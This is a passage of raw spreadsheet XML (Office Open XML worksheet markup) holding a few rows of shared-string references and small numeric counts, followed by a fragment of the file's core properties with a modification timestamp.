    <col min="2" max="2" width="15.5" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="15.33203125" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="3" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A3" s="2" t="s">
        <v>213</v>
      </c>
      <c r="B3" t="s">
        <v>215</v>
      </c>
      <c r="C3" t="s">
        <v>216</v>
      </c>
    </row>
    <row r="4" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A4" s="3" t="s">
        <v>134</v>
      </c>
      <c r="B4" s="4">
        <v>6</v>
      </c>
      <c r="C4" s="4">
        <v>35</v>
      </c>
    </row>
    <row r="5" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A5" s="3" t="s">
        <v>182</v>
      </c>
      <c r="B5" s="4">
        <v>3</v>
      </c>
      <c r="C5" s="4">
        <v>24</v>
      </c>
    </row>
    <row r="6" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6" s="3" t="s">
        <v>108</v>
      </c>
      <c r="B6" s="4">
        <v>6</v>
      </c>
      <c r="C6" s="4">
        <v>25</v>
      </c>
    </row>
    <row r="7" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A7" s="3" t="s">
        <v>169</v>
      </c>
      <c r="B7" s="4">
        <v>2</v>
      </c>
      <c r="C7" s="4">
        <v>13</v>
      </c>
    </row>
    <row r="8" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A8" s="3" t="s">
        <v>214</v>
      </c>
      <c r="B8" s="4">
        <v>17</v>
      </c>
      <c r="C8" s="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2025-04-23T11:27:16Z</dcterms:modified>
</cp:coreProperties>
</file>